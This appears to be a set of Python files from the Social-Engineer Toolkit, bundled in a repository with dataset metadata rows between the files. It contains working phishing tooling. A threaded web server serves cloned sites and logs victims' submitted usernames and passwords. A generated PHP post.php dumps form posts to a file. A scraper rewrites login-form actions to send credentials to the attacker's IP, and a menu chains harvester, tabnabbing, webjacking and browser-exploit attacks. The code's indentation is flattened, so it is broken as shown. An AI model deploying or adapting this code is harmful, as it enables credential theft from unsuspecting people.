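# gets one when a victim actually POSTs form data; the report generator later counts
# the lines in each file to show how many people viewed the page versus submitted it.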
# SET Handler for handling POST requests and general setup through SSL
class SETHandler(BaseHTTPRequestHandler):
extensions_map = _encodings_map_default = {
'.gz': 'application/gzip',
'.Z': 'application/octet-stream',
'.bz2': 'application/x-bzip2',
'.xz': 'application/x-xz',
}
def setup(self):
# added a try except block in case of transmission errors
try:
self.connection = self.request
self.rfile = socket.SocketIO(self.request, "rb")
self.wfile = socket.SocketIO(self.request, "wb")
# except errors and pass them
except:
pass
def translate_path(self, path, webroot):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split('?',1)[0]
path = path.split('#',1)[0]
# Don't forget explicit trailing slash when normalizing. Issue17324
trailing_slash = path.rstrip().endswith('/')
try:
path = urllib.parse.unquote(path, errors='surrogatepass')
except UnicodeDecodeError:
path = urllib.parse.unquote(path)
path = posixpath.normpath(path)
words = path.split('/')
words = filter(None, words)
path = webroot
for word in words:
if os.path.dirname(word) or word in (os.curdir, os.pardir):
# Ignore components that are not a simple file/directory name
continue
path = os.path.join(path, word)
if trailing_slash:
path += '/'
return path
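    # Example of the mapping performed above (hypothetical request and paths): a GET
    # for "/images/logo.png?v=2" against a webroot of "<userconfigpath>/web_clone" is
    # translated to "<userconfigpath>/web_clone/images/logo.png"; the query string is
    # dropped and any ".." components are skipped so a request cannot escape the
    # cloned-site directory.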
def guess_type(self, path):
"""Guess the type of a file.
Argument is a PATH (a filename).
Return value is a string of the form type/subtype,
usable for a MIME Content-type header.
The default implementation looks the file's extension
up in the table self.extensions_map, using application/octet-stream
as a default; however it would be permissible (if
slow) to look inside the data to make a better guess.
"""
base, ext = posixpath.splitext(path)
if ext in self.extensions_map:
return self.extensions_map[ext]
ext = ext.lower()
if ext in self.extensions_map:
return self.extensions_map[ext]
guess, _ = mimetypes.guess_type(path)
if guess:
return guess
return 'application/octet-stream'
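    # For illustration: ".gz" resolves from the table above to "application/gzip",
    # ".html" falls through to mimetypes.guess_type() and comes back as "text/html",
    # and a completely unknown extension is served as "application/octet-stream".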
def copyfile(self, source, outputfile):
"""Copy all data between two file objects.
The SOURCE argument is a file object open for reading
(or anything with a read() method) and the DESTINATION
argument is a file object open for writing (or
anything with a write() method).
The only reason for overriding this would be to change
the block size or perhaps to replace newlines by CRLF
        -- note however that the default server uses this
to copy binary data as well.
"""
shutil.copyfileobj(source, outputfile)
# handle basic GET requests
def do_GET(self):
# import proper style css files here
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
#print('-' * 40)
#print('Exception happened during processing of request from', end=' ')
print(client_address)
#import traceback
#traceback.print_exc() # XXX But this goes to stderr!
#print('-' * 40)
pass
webroot = os.path.abspath(os.path.join(userconfigpath, 'web_clone'))
requested_file = os.path.abspath(os.path.join(webroot, os.path.relpath(self.path, '/')))
# try block setup to catch transmission errors
try:
if self.path == "/":
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
fileopen = open(userconfigpath + "web_clone/index.html", "r")
for line in fileopen:
line = line.encode('utf-8')
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
# visits.close()
# used for index2
elif self.path == "/index2.html":
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
fileopen = open(userconfigpath + "web_clone/index2.html", "r")
for line in fileopen:
line = line.encode('utf-8')
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
# visits.close()
else:
if os.path.isfile(requested_file):
path = self.translate_path(self.path, webroot)
ctype = self.guess_type(path)
fileopen = open(requested_file, "rb")
fs = os.fstat(fileopen.fileno())
self.send_response(200)
self.send_header("Content-Type", ctype)
self.send_header("Content-Length", str(fs[6]))
self.end_headers()
self.copyfile(fileopen, self.wfile)
else:
self.send_response(404)
self.end_headers()
# handle errors, log them and pass through
except Exception as e:
# log to set
log(e)
# pass exceptions to keep going
pass
# handle POST requests
def do_POST(self):
length = int(self.headers.get('content-length'))
#length = length.decode('utf-8')
qs = self.rfile.read(length)
url = urldecode(qs)
# specify we had a bite
bites.write("hit\n")
url = url.split("&")
# change path to root for append on file
os.chdir(homepath)
# put the params into site.template for later user
filewrite = open(userconfigpath + "site.template", "a")
filewrite.write("\n")
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w")
filewrite3.write("")
filewrite3.close()
filewrite2 = open("%s/src/logs/harvester.log" % os.getcwd(), "a")
filewrite.write("\n\n")
print(bcolors.RED + "[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN)
for line in url:
counter = 0
line = line.rstrip()
# if regular expression hit on user fields then do different
match = re.search(
"Email|email|login|logon|Logon|Login|user|username|Username|User", line)
if match:
print(bcolors.RED + "POSSIBLE USERNAME FIELD FOUND: " + line + "\r" + bcolors.GREEN)
counter = 1
match2 = re.search(
"pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass", line)
if match2:
# if you don't want to capture a password, turn this off, note
# not an exact science
log_password = check_config("HARVESTER_LOG_PASSWORDS=")
if log_password.lower() == "on":
print(bcolors.RED + "POSSIBLE PASSWORD FIELD FOUND: " + line + "\r" + bcolors.GREEN)
else:
line = ""
counter = 1
filewrite.write(html.escape("PARAM: " + line + "\n"))
filewrite2.write(line + "\n")
# if a counter hits at 0 then print this line
if counter == 0:
print("PARAM: " + line + "\r")
# reset counter
counter = 0
filewrite.write("BREAKHERE")
filewrite.close()
filewrite2.close()
if attack_vector != 'multiattack':
print(bcolors.RED + "[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC)
# pull URL field
counter = 0
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("URL=", line)
if match:
                RAW_URL = line.replace("URL=", "")
                # strip the scheme so URL holds just the host/path portion
                URL = RAW_URL.replace("http://", "").replace("https://", "")
counter = 1
if counter == 0:
URL = ''
# this checks the set_config to see if we need to redirect to a
# different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=")
if harvester_redirect.lower() == "on":
RAW_URL = check_config("HARVESTER_URL=")
counter = 1
# when done posting send them back to the original site
self.send_response(302, 'Found')
self.send_header('Location', RAW_URL)
self.end_headers()
htmll = ('<!doctype html><html><head><meta http-equiv="refresh" content="0; url=%s"><title>Loading...</title></head><body></body></html>' % (RAW_URL)).encode('utf-8')
self.wfile.write(htmll)
# set it back to our homepage
os.chdir(userconfigpath + "web_clone/")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def run():
# check if we are not running apache mode
if apache_check == False:
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
server.socket.close()
generate_reports()
# handle the rest
except Exception as e:
print(bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?" + bcolors.ENDC)
apache_stop = input("Do you want to attempt to disable Apache? [y/n]: ")
apache_counter = 0
if apache_stop == "yes" or apache_stop == "y" or apache_stop == "":
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/nginx"):
subprocess.Popen("/etc/init.d/nginx stop", shell=True).wait()
apache_counter = 1
if apache_counter == 1:
# check if we are running apache mode
print_status("Successfully stopped Apache. Starting the credential harvester.")
print_status("Harvester is ready, have victim browse to your site.")
if apache_check == False:
try:
try:
server = ThreadedHTTPServer(
('', int(web_port)), SETHandler)
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
generate_reports()
server.socket.close()
except Exception:
apache_counter = 0
#if apache_counter == 0:
# print(bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC)
# print("[*] Printing error: " + str(e) + "\n")
# return_continue()
# exit_set()
# if we are using apache, then use the harvester php type that writes it out to post.php
# note just change the index.html to post somewhere else and rename the
# post.php to something else
if apache_check == True:
try:
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', int(web_port)))
ipaddr.settimeout(2)
if ipaddr:
pass
except Exception as e:
if os.path.isfile("/etc/init.d/apache2"):
            apache_start = input("[!] Apache may not be running, do you want SET to start the process? [y/n]: ")
if apache_start == "y":
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
try:
apache_dir = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_dir + "/html"):
apache_dir = apache_dir + "/html"
print(bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website.")
except Exception as e:
print(e)
print("Please note that all output from the harvester will be found under apache_dir/harvester_date.txt")
print("Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC)
filewrite = open("%s/post.php" % (apache_dir), "w")
now = str(datetime.datetime.today())
harvester_file = ("harvester_" + now + ".txt")
filewrite.write("""<?php $file = '%s';file_put_contents($file, print_r($_POST, true), FILE_APPEND); \n/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */ ?><meta http-equiv="refresh" content="0; url=%s" />\n""" % (harvester_file, RAW_URL))
filewrite.close()
if os.path.isdir("/var/www/html"):
logpath = ("/var/www/html")
filewrite = open("%s/%s" % (logpath, harvester_file), "w")
filewrite.write("")
filewrite.close()
# Check sys platform to perform chown
if sys.platform == "darwin":
subprocess.Popen("chown _www:_www '%s/%s'" % (logpath, harvester_file), shell=True).wait()
else:
subprocess.Popen("chown www-data:www-data '%s/%s'" % (logpath, harvester_file), shell=True).wait()
# if we are using webjacking, etc.
if os.path.isfile(userconfigpath + "web_clone/index2.html"):
# need to copy the files over - remove the old one first if there
if os.path.isfile(apache_dir + "/index2.html"):
os.remove(apache_dir + "/index2.html")
shutil.copyfile(userconfigpath + "web_clone/index2.html", apache_dir + "/index2.html")
# here we specify if we are tracking users and such
if track_email == True:
fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file))
filewrite = open(userconfigpath + "web_clone/index.2", "w")
filewrite.write(data)
filewrite.close()
os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(userconfigpath + "web_clone/index.2", userconfigpath + "web_clone/index.html")
# copy the entire web_clone directory.
# Without this only index.php|html are copied even though the user
# may have chosen to import the entire directory in the set module.
copyfolder(userconfigpath + "web_clone", apache_dir)
if os.path.isfile("%s/index.html" % (apache_dir)): os.remove("%s/index.html" % (apache_dir))
if track_email == False: shutil.copyfile(userconfigpath + "web_clone/index.html", "%s/index.html" % (apache_dir))
if track_email == True:
shutil.copyfile(userconfigpath + "web_clone/index.html", "%s/index.php" % (apache_dir))
print_status("NOTE: The URL to click on is index.php NOT index.html with track emails.")
print_status("All files have been copied to %s" % (apache_dir))
if attack_vector != 'multiattack':
try:
print_status("SET is now listening for incoming credentials. You can control-c out of this and completely exit SET at anytime and still keep the attack going.")
print_status("All files are located under the Apache web root directory: " + apache_dir)
print_status("All fields captures will be displayed below.")
print("[Credential Harvester is now listening below...]\n\n")
tail(apache_dir + "/" + harvester_file)
except KeyboardInterrupt:
print_status("Exiting the menu - note that everything is still running and logging under your web directory path: " + apache_dir)
pause = input("{Press return to continue}")
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
try:
SocketServer.BaseServer.__init__(self, server_address, HandlerClass)
except NameError:
socketserver.BaseServer.__init__(self, server_address, HandlerClass)
        # SSLv23_METHOD negotiates the highest SSL/TLS version supported by both sides
ctx = SSL.Context(SSL.SSLv23_METHOD)
# pem files defined before
fpem_priv = 'newreq.pem'
fpem_cli = 'newcert.pem'
# establish private key
ctx.use_privatekey_file(fpem_priv)
# establish public/client certificate
ctx.use_certificate_file(fpem_cli)
# setup the ssl socket
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
# bind to interface
self.server_bind()
# activate the interface
self.server_activate()
def shutdown_request(self, request):
try:
pass
except Exception as e:
request.shutdown()
def ssl_server(HandlerClass=SETHandler, ServerClass=SecureHTTPServer):
try:
# bind to all interfaces on 443
server_address = ('', 443) # (address, port)
# setup the httpd server
server = ServerClass(server_address, HandlerClass)
# serve the httpd server until exit
server.serve_forever()
except Exception as e:
print_error("Something went wrong.. Printing error: " + str(e))
except KeyboardInterrupt:
generate_reports()
def generate_reports():
os.chdir(homepath)
try:
visits.close()
bites.close()
except:
pass
if attack_vector != 'multiattack':
try:
module_reload(src.webattack.harvester.report_generator)
except:
import src.webattack.harvester.report_generator
if attack_vector != 'multiattack':
return_continue()
if track_email == True:
webattack_email = True
# if emailer webattack, spawn email questions
if webattack_email == True:
try:
import src.phishing.smtp.client.smtp_web
except Exception as e:
module_reload(src.phishing.smtp.client.smtp_web)
# see if we're tabnabbing or multiattack
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == 'tabnabbing':
print(bcolors.RED + "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.")
if apache_check == True:
print_status("You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.")
input("Press {return} if you understand what we're saying here.")
if line == 'webjacking': print(bcolors.RED + "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.")
if ssl_flag == 'true':
web_port = "443"
# check for PEM files here
if not os.path.isfile(userconfigpath + "newreq.pem"):
print("PEM files not detected. SSL will not work properly.")
if not os.path.isfile(userconfigpath + "newcert.pem"):
print("PEM files not detected. SSL will not work properly.")
# copy over our PEM files
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# copy patched socket over to web clone
definepath = os.getcwd()
# we need to move a modified version of socket to handle SSL
#shutil.copyfile("%s/src/core/patched/socket.py" % (definepath), "%s/socket.py" % (definepath))
# head over to cloned dir
if apache_check == False:
os.chdir(userconfigpath + "web_clone/")
if attack_vector != "multiattack":
if apache_check == False:
print(bcolors.BLUE + "[*] The Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port " + web_port + "\r")
print("[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC)
else:
print(bcolors.BLUE + "[*] Apache is set to ON - everything will be placed in your web root directory of apache.")
print(bcolors.BLUE + "[*] Files will be written out to the root directory of apache.")
print(bcolors.BLUE + "[*] ALL files are within your Apache directory since you specified it to ON.")
# catch all
try:
# if we are using ssl
if ssl_flag == 'true':
print_status("Starting built-in SSL server")
ssl_server()
# if we aren't using ssl
if ssl_flag == 'false':
run()
except:
# cleanup modified socket
#if ssl_flag == "true":
#if os.path.isfile(definepath + "/socket.py"):
# os.remove(definepath + "/socket.py")
#if os.path.isfile(definepath + "/socket.pyc"):
# os.remove(definepath + "/socket.pyc")
pass
| 29,492 | Python | .py | 635 | 36.505512 | 343 | 0.601377 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,815 | scraper.py | CHEGEBB_africana-framework/externals/set/src/webattack/harvester/scraper.py | #!/usr/bin/env python3
import os
import sys
import re
import subprocess
import urllib
import shutil
from src.core.setcore import *
#
# Scraper will grab the cloned website and try defining post parameters
#
# grab ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
    ipaddr = input(setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
# set the multiattack tabnabbing/webjacking flag
multi_tabnabbing = "off"
multi_webjacking = "off"
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multi_tabnabbing = "on"
if os.path.isfile(userconfigpath + "multi_webjacking"):
multi_webjacking = "on"
# see if we're tabnabbing
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
site = 'index2.html'
else:
site = 'index.html'
# set ssl flag to false by default
ssl_flag = "false"
# SEE IF WE WANT TO USE SSL
ssl_check = check_config("WEBATTACK_SSL=").lower()
if ssl_check == "on":
ssl_flag = "true"
# check apache mode
apache_mode = check_config("APACHE_SERVER=").lower()
# if we are turned on this will change to /post.php
track_user = check_config("TRACK_EMAIL_ADDRESSES=").lower()
if track_user == "on":
apache_mode = "on"
apache_rewrite = ""
# if we are turned on, change this
if apache_mode == "on":
apache_rewrite = "post.php"
# start the scraping process
fileopen = open(userconfigpath + "web_clone/%s" % (site), "r", encoding='utf-8', errors='ignore').readlines()
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
for line in fileopen:
# specify if it found post params
counter = 0
# if we hit on a post method
match = re.search('post', line, flags=re.IGNORECASE)
method_post = re.search("method=post", line, flags=re.IGNORECASE)
if match or method_post:
        # regex for now, can probably use htmlparser later, but right now what it's
        # doing is replacing any url in the "action" field with your victim IP which
        # will have a custom web server running to post the data to your site
if ssl_flag == 'false':
            line = re.sub(
                r'action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if ssl_flag == 'true':
            line = re.sub(
                r'action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub(
'action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
# this is if twitter is in use, we rename a function name to something
# garbage to remove password phishing restrictions
match2 = re.search(
"swiftActionQueue={buckets:j", line, flags=re.IGNORECASE)
if match2:
# garble the buckets name, causes password to not be jacked
line = line.replace(
"swiftActionQueue={buckets:j", "swiftActionQueue={3buckets:j")
filewrite.write(line)
# close the file
filewrite.close()
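# Rough illustration of the rewrite above (the IP below is a made-up example): a
# cloned form such as
#   <form method="post" action="https://example.com/session/login/">
# becomes
#   <form method="post" action="https://10.0.0.5/">
# so the victim's credential POST lands on the harvester listener instead of the
# real site (http:// is substituted instead when WEBATTACK_SSL is off).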
# move our newly created website with our post stuff to our cloned area
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site)
if os.path.isfile(userconfigpath + "web_clone/" + site):
os.remove(userconfigpath + "web_clone/" + site)
shutil.move(userconfigpath + "web_clone/index.html.new",
userconfigpath + "web_clone/%s" % (site))
| 3,777 | Python | .py | 92 | 35.771739 | 109 | 0.651214 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,816 | multiattack.py | CHEGEBB_africana-framework/externals/set/src/webattack/multi_attack/multiattack.py | #!/usr/bin/env python3
import re
import sys
import os
import subprocess
import time
import signal
# Grab the central imports
definepath = os.getcwd()
sys.path.append(definepath)
from src.core.setcore import *
operating_system = check_os()
me = mod_name()
#######################################################
# Heres the brains behind the multiattack vector.
# This preps each check and payload for each attack
# vector.
#######################################################
def return_menu():
print_status("Option added. You may select additional vectors")
time.sleep(2)
print("""\nSelect which additional attacks you want to use:\n""")
# option designators needed to ensure its defined ahead of time
java_applet = "off"
meta_attack = "off"
harvester = "off"
tabnabbing = "off"
mlitm = "off"
webjacking = "off"
# turning flag on
def flag_on(vector):
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
# turning flag off
def flag_off(vector):
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.RED + "OFF" + bcolors.ENDC)
# filewriting
def write_file(filename, results):
filewrite = open(userconfigpath + "%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
# specify attackvector
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("multiattack")
filewrite.close()
# on and off switch detection variable
trigger = ""
# set toggle flags here
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# grab current path
definepath = os.getcwd()
# default flag for webdav to be off
webdav_enable = "OFF"
# see if we are running a custom cloned website
clonedurl = 0
fileopen = open(userconfigpath + "site.template", "r")
data = fileopen.read()
if "TEMPLATE=SELF" in data:
clonedurl = 1
# clean up cloner directory
if clonedurl == 0:
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants
a = 1
print ("""
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
    and allows the user to choose the method for the attack. Once
    you select one of the attacks, it will be added to your
    attack profile to be used to stage the attack vector. When
    you're finished, be sure to select the 'I'm finished' option.""")
print("""\nSelect which attacks you want to use:
""")
while a == 1:
trigger = ""
print(" 1. Java Applet Attack Method" + toggleflag_java)
print(" 2. Metasploit Browser Exploit Method" + toggleflag_meta)
print(" 3. Credential Harvester Attack Method" + toggleflag_harv)
print(" 4. Tabnabbing Attack Method" + toggleflag_tabnab)
print(" 5. Web Jacking Attack Method" + toggleflag_webjacking)
print(" 6. Use them all - A.K.A. 'Tactical Nuke'")
print(" 7. I'm finished and want to proceed with the attack")
print("\n 0. Return to Main Menu\n")
profile = input(
setprompt(["2", "16"], "Enter selections one at a time (7 to finish)"))
if profile == "":
profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will
# trigger invalid option
try: # this will trigger an error if it isnt an integer
profile = int(profile)
# convert it back
profile = str(profile)
# if it triggers an exception reassign profile to option 8
except:
profile = "10"
# if you want to return to main menu
if profile == "0":
break
# trigger invalid option
if int(profile) >= 10:
input("\nInvalid option..")
return_continue()
if profile == "6":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print(bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
(: :)
':._ _.:'
| |
(=====)
| |
| |
| |
((/ \))""") + bcolors.ENDC)
print("\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?")
print("\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n")
java_applet = "on"
meta_attack = "on"
harvester = "on"
break
if profile == "7":
break
# java applet on/off
if profile == "1":
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet = "on"
trigger = 1
# toggle_flags here
toggleflag_java = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet = "off"
# toggle flags here
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack == "off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack = "on"
trigger = 1
# toggle flags here
toggleflag_meta = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if meta_attack == "on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack = "off"
# toggle flags here
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester = "on"
trigger = 1
# toggle flags here
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester = "off"
# toggle flags here
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing = "on"
trigger = 1
harvester = "on"
# toggle flags here
toggleflag_tabnab = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
print(webjacking)
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing = "off"
harvester = "off"
# toggle flags here
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# turn webjacking on
if profile == "5":
if webjacking == "off":
flag_on("Web Jacking")
webjacking = "on"
return_menu()
trigger = 1
if tabnabbing == "on" or mlitm == "on":
print("[*] You cannot use MLITM and Tabnabbing in the same attack!")
print("[*] Disabling MLITM and/or Tabnabbing")
mlitm = "off"
tabnabbing = "off"
harvester = "on"
# toggle flags here
toggleflag_mlitm = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if harvester == "off":
harvester = "on"
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking = "off"
# toggle flags here
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# next series of flags needed
payloadgen = 0
# write handler files for detection
if java_applet == "on":
write_file("multi_java", "multiattack=java_on")
if meta_attack == "on":
write_file("multi_meta", "multiattack=meta_on")
if tabnabbing == "on":
write_file("multi_tabnabbing", "multiattack=tabnabbing_on")
if harvester == "on":
write_file("multi_harvester", "multiattack=harvester_on")
if mlitm == "on":
write_file("multi_mlitm", "multiattack=mlitm_on")
if webjacking == "on":
write_file("multi_webjacking", "multiattack=webjacking_on")
# hit cloner flag
# if any of the flags are turned on, then trigger to see if ARP Cache
# needs to be enabled
if java_applet == "on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me, "importing 'src.webattack.web_clone.cloner'", 1)
try:
module_reload(cloner)
except:
import cloner
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me, "importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# start the stuff for java applet
if java_applet == "on":
sys.path.append("src/core/payloadgen/")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(create_payloads)
except:
import create_payloads
payloadgen = 1
applet_choice()
# start the stuff for metasploit client side
if meta_attack == "on":
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
# this checks to see if the MSF payload uses webdav, if so we have to
# force port 80
if os.path.isfile(userconfigpath + "webdav_enabled"):
        webdav_enable = "on"  # keep the flag name consistent with the default set above
# set this incase msf attack, java applet, and harvester is needed
pexpect_flag = "off"
# start the stuff for harvester
if harvester == "on" or tabnabbing == "on" or webjacking == "on":
if tabnabbing == "on" or webjacking == "on":
        # if tabnabbing is on, set the tabnabbing flag to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(tabnabbing)
except:
import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag = "on"
a = subprocess.Popen(
"python3 src/webattack/harvester/harvester.py", shell=True)
# start stuff for mlitm
if mlitm == "on":
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a = subprocess.Popen("python3 src/mlitm/mlitm.py")
else:
debug_msg(me, "importing 'src.mlitm.mlitm'", 1)
try:
module_reload(mlitm)
except:
import mlitm
# start the web server
if java_applet == "on" or meta_attack == "on":
sys.path.append("src/html/")
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
module_reload(spawn)
except:
import spawn
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
os.chdir(definepath)
sys.path.append("%s/src/webattack/harvester/" % (definepath))
import report_generator
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill(a.pid, signal.SIGTERM)
print_status("\nReport exported.")
return_continue()
| 13,603 | Python | .py | 349 | 30.30659 | 115 | 0.569458 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,817 | webprofiler.py | CHEGEBB_africana-framework/externals/set/src/webattack/profiler/webprofiler.py | #!/usr/bin/env python3
#
# victim profile code here
#
from src.core.setcore import return_continue, print_info
def prep_website():
print_info("This feature is currently under development and disabled.")
return_continue()
prep_website()
